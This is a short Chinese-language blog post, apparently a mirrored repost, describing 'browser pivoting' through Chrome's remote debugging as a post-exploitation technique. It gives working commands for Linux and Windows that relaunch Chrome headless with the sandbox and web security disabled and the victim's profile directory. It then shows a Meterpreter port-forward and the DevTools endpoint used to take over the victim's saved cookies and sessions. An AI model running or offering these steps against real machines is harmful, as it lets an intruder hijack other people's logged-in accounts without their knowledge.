zoukankan html css js c++ java

# Chrome Browser Pivoting

前言

上个星期有人在QQ群问到CobaltStrike里的一个功能Browser Pivoting，官方文档。有没有Chrome版的(自带的字支持IE浏览器)，我隐隐约约记得Metasploit里有一个模块，但是这个是chrome debugger的辅助模块，平时也写前端，会用到chrome浏览器调试，就知道有这么一个功能可以利用远程调试实现Browser Pivoting。

思路

启动远程调试

Linux下的

google-chrome-stable --allow-file-access-from-files --no-sandbox --disable-popup-blocking --remote-debugging-port=9222 --disable-web-security --headless --user-data-dir=”/home/kali-team/.config/google-chrome“

Windows下的

"C:UsersAdministratorAppDataLocalGoogleChromeApplicationchrome.exe" --safebrowsing-disable-auto-update --disable-sync --metrics-recording-only --mute-audio --no-first-run --disable-web-security --disable-gpu --disable-popup-blocking --allow-file-access-from-files --headless --no-sandbox  --user-data-dir="C:UsersAdministratorAppDataLocalGoogleChromeUser Data"  --remote-debugging-port=9222

一定要设置--user-data-dir参数，不然利用不了保存在本地的cookie和session。

端口映射

你怎么喜欢怎么来，用什么方法随便你。

portfwd add -L 0.0.0.0 -l 9222 -p 9222 -r 127.0.0.1

把远程端口9222映射到本地的9222

打开本地浏览器

访问：http://127.0.0.1:9222/json

[ {
   "description": "",
   "devtoolsFrontendUrl": "/devtools/inspector.html?ws=127.0.0.1:9222/devtools/page/55337A3040EA9F48A491F49866699575",
   "id": "55337A3040EA9F48A491F49866699575",
   "title": "about:blank",
   "type": "page",
   "url": "about:blank",
   "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/55337A3040EA9F48A491F49866699575"
} ]

开发文档：这里
打开：http://127.0.0.1:9222/devtools/inspector.html?ws=127.0.0.1:9222/devtools/page/55337A3040EA9F48A491F49866699575
这样就可以利用对方的浏览器cookie和session了，界面有点想平板。不知道怎么调。

查看全文

相关阅读:
JS模板引擎：ArtTemplate （2）
JS模板引擎：ArtTemplate （1）
nodeJs 初探 ~
javascript高级函数
 Js高程笔记->引用类型
 html5离线存储
 （摘抄）HTTP 协议详解
 cordova /phonegap 自定义插件
 phonegap/cordova常用命令
 phonegap上传以及下载图片

原文地址：https://www.cnblogs.com/Kali-Team/p/13121920.html

Copyright © 2011-2022 走看看